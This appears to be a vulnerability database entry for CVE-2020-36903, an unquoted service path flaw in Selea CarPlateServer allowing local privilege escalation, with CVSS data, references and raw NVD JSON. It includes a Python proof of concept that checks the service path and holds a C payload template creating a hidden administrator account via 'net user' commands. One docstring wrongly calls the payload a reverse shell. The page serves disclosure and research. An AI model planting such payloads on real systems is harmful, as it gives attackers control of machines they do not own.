CVE-2020-36903

Description

Selea CarPlateServer 4.0.1.6 contains an unquoted service path vulnerability in the Windows service configuration that allows local users to potentially execute code with elevated privileges. Attackers can exploit the service's unquoted binary path by inserting malicious code in the system root path that could execute with LocalSystem privileges during application startup or reboot.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Selea CarPlateServer <= 4.0.1.6

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2020-36903 PoC - Selea CarPlateServer Unquoted Service Path
# This PoC demonstrates the unquoted service path vulnerability in Selea CarPlateServer

import os
import sys
import subprocess

def check_vulnerable_service():
    """
    Check if Selea CarPlateServer service is installed and has unquoted path
    """
    try:
        # Query service information using WMIC or sc command
        cmd = 'wmic service where "name like \'CarPlateServer%\'" get pathname'
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        print(f"[+] Service Info: {result.stdout}")
        
        # Check if path contains spaces and is not quoted
        path = result.stdout.strip()
        if ' ' in path and not (path.startswith('"') and path.endswith('"')):
            print("[+] Service is VULNERABLE - Path contains spaces without quotes")
            return True
        return False
    except Exception as e:
        print(f"[-] Error checking service: {e}")
        return False

def create_malicious_executable():
    """
    Create a malicious executable to be placed in the unquoted path
    This creates a reverse shell payload
    """
    # Payload: Create a simple executable that adds a new admin user
    # In real attack, this would be a more sophisticated payload
    malicious_code = '''
#include <windows.h>
#include <stdlib.h>

int main() {
    // Add new administrator user (for demonstration)
    system("net user attacker P@ssw0rd123 /add");
    system("net localgroup Administrators attacker /add");
    
    // Spawn reverse shell or execute other malicious code
    WinExec("cmd.exe /c whoami > C:\\\\temp\\\\pwned.txt", SW_HIDE);
    
    return 0;
}
'''
    print("[+] Malicious executable template created")
    print("[+] In real attack, compile and place in unquoted path directory")
    return True

def exploit():
    """
    Main exploitation function
    """
    print("=" * 60)
    print("CVE-2020-36903 - Selea CarPlateServer Unquoted Service Path")
    print("=" * 60)
    
    # Step 1: Check if vulnerable
    if not check_vulnerable_service():
        print("[-] Service not found or not vulnerable")
        return False
    
    # Step 2: Identify exploitable path components
    print("\n[+] Identifying exploitable path components...")
    print("[+] Example: If path is C:\\\\Program Files\\\\Selea\\\\CarPlateServer.exe")
    print("[+] Attacker can place executable at: C:\\\\Program.exe")
    
    # Step 3: Create malicious executable
    create_malicious_executable()
    
    print("\n[!] IMPORTANT: This is for educational purposes only")
    print("[+] In real attack scenario:")
    print("    1. Create malicious executable")
    print("    2. Place it in the unquoted path directory")
    print("    3. Wait for service restart or system reboot")
    print("    4. Malicious code executes with LocalSystem privileges")
    
    return True

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-36903
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-36903
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-36903/
[4] VulDB https://vuldb.com/cve/CVE-2020-36903
[5] https://www.exploit-db.com/exploits/49453
[6] https://www.selea.com
[7] https://www.vulncheck.com/advisories/selea-carplateserver-local-privilege-escalation-via-unquoted-service-path
[8] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5621.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-36903", "sourceIdentifier": "[email protected]", "published": "2025-12-31T19:15:41.353", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Selea CarPlateServer 4.0.1.6 contains an unquoted service path vulnerability in the Windows service configuration that allows local users to potentially execute code with elevated privileges. Attackers can exploit the service's unquoted binary path by inserting malicious code in the system root path that could execute with LocalSystem privileges during application startup or reboot."}, {"lang": "es", "value": "Selea CarPlateServer 4.0.1.6 contiene una vulnerabilidad de ruta de servicio sin comillas en la configuración del servicio de Windows que permite a usuarios locales ejecutar código potencialmente con privilegios elevados. Los atacantes pueden explotar la ruta binaria sin comillas del servicio insertando código malicioso en la ruta raíz del sistema que podría ejecutarse con privilegios de LocalSystem durante el inicio de la aplicación o el reinicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49453", "source": "[email protected]"}, {"url": "https://www.selea.com", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/selea-carplateserver-local-privilege-escalation-via-unquoted-service-path", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5621.php", "source": "[email protected]"}]}}